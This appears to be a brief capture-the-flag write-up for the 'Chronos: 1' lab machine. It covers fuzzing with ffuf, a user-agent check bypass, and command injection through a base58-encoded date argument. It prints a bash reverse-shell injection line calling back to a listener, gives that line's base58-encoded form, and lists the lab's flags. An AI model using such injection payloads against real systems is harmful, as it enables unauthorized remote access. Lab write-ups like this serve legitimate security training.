Chronos: 1

By Lawcky 18/01/24

Introduction

Chronos

Difficulty : Medium

Additionnal info :

Name: Name: Chronos: 1
Release date: 9 Aug 2021
Author: AL1ENUM
Series: Chronos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

---

In this write-up

• nmap
• nikto
• ffuf
• base58
• node-JS
• node SUID

---

Write-UP

FUZZING

with ffuf.
fuzzing on : ‘’/FUZZ" “/FUZZ.txt” “/.FUZZ” “/.FUZZ.txt”

ffuf -w /usr/share/SecLists/Discovery/Web-Content/commont.txt:FUZZ -u http://192.168.1.16/FUZZ

in the source code of the index page of the port 8000 we see :

echo '192.168.1.16 chronos.local' >> /etc/hosts

the default page changes with the new hosts entry,
the permission for the specific page is denied because it is checking user agent as we can see here

lets connect with this user-agent

after changing the user agent to Chronos we can access the page

now lets decrypt the url format

this is an argument for the date linux command

---

chronos related issue

for some reason the browser kept crashing, after each command injected the web server crash and the vm has to be restarted which means we get 1 try until a reset is needed

---

RCE

we know that the date command is executed and that the arguments are encoded in base58,

lets encode a reverse shell into base58 and run it on the website.

;bash -c 'bash -i >& /dev/tcp/192.168.1.253/4444 0>&1'

encoded it is :

5nhYKfQBzH6BmbLsTqeyjoqpNb5tSzqVixeEC3bDRyTxC4tyjvv9YtbLU8UNTJmSgeJbVbayC2

---

Privilege Escalation

from www-date to user

user imera

using the node.js file upload service we can upload a reverse shell on it using this

byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK first flag found

---

Privilege Escalation

from imera to root

sudo -l

using the node GTFObin

YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK

got second flag